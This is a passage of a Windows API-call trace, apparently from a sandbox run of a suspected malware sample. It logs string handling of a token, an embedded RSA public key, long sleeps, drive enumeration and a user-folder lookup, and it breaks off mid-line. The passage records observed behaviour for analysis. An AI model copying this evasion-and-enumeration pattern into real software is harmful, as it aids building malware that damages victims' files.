| out: lpString1="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0074.155] lstrcpyA (in: lpString1=0xfbca778, lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0074.155] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.155] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.155] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.155] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.155] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.155] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.155] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.155] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.155] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.156] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.157] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.157] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3878 [0074.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x854) returned 0x3171760 [0074.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c3878, cbMultiByte=-1, lpWideCharStr=0x3171760, cchWideChar=1066 | out: lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 43 [0074.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31d40e8 [0074.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3171760 | out: hHeap=0x680000) returned 1 [0074.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3878 | out: hHeap=0x680000) returned 1 [0074.157] lstrcpyW (in: lpString1=0x521cf0, lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0074.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d40e8 | out: hHeap=0x680000) returned 1 [0074.157] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0074.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x56) returned 0x31c71a0 [0074.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfbca778, cbMultiByte=-1, lpWideCharStr=0x31c71a0, cchWideChar=43 | out: lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 43 [0074.157] lstrcpyW (in: lpString1=0x521cf0, lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0074.157] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0074.157] lstrlenW (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 40 [0074.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3173088 | out: hHeap=0x680000) returned 1 Thread: id = 44 os_tid = 0x8c4 [0075.087] timeGetTime () returned 0x1159453 [0075.087] GetLastError () returned 0x54f [0075.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3bc) returned 0x31ffa20 [0075.088] GetCurrentThreadId () returned 0x8c4 [0075.088] SetLastError (dwErrCode=0x54f) [0075.088] Sleep (dwMilliseconds=0x186a0) [0089.191] Sleep (dwMilliseconds=0x3e8) [0090.633] GetLogicalDrives () returned 0x4 [0090.633] SetErrorMode (uMode=0x1) returned 0x0 [0090.633] PathFileExistsA (pszPath="C:\\") returned 1 [0090.634] SetErrorMode (uMode=0x0) returned 0x1 [0090.634] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0090.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x806) returned 0x31cf750 [0090.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ccfe60, cbMultiByte=-1, lpWideCharStr=0x31cf750, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0090.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0090.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x6a5cc8 [0090.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.635] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.642] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.642] PathFindFileNameW (pszPath="") returned="" [0090.642] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.643] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.643] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, 